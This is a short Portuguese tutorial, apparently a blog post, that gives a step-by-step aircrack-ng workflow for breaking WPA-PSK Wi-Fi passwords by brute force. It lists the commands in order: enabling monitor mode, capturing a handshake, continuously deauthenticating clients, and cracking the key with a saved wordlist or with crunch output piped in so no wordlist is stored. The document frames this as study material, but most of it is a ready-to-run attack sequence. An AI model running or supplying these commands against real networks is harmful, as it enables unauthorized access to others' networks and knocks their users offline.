A tática de descobrir a chave (vulgarmente conhecida como ‘senha do Wi-Fi’) no protocolo de autenticação WPA por intermédio da técnica de força bruta (tentativa e erro) está longe de ser uma das mais eficientes ou inteligentes, mas ainda é muito funcional.
A exemplo do post sobre Criptoanálise com protocolo WEP, abaixo apresento um roteiro objetivo e didático para quem já conhece ou está estudando ataques a redes sem fio WPA com PSK (chave compartilhada de criptografia), onde a wordlist (dicionário utilizado) não precisa ser armazenada no computador do atacante. Vamos a ele:
#Alterar interface de rede para modo monitor
airmon-ng start wlan0
#Monitorar redes (gerando dump)
airodump-ng wlan0mon --bssid MAC_AP -w arquivo -c CANAL wlan0mon
#Desautenticando clientes
aireplay-ng --deauth 0 -c MAC_CLIENTE -a MAC_AP wlan0mon
#Quebrando chave por brute force (com wordlist salva)
aircrack-ng -w wordlist arquivo.cap
#Usando wordlists sem salvar em disco para ataque de brute force
crunch 1 10 1234567890abcdefgh | aircrack-ng -w - -b MAC_AP arquivo.cap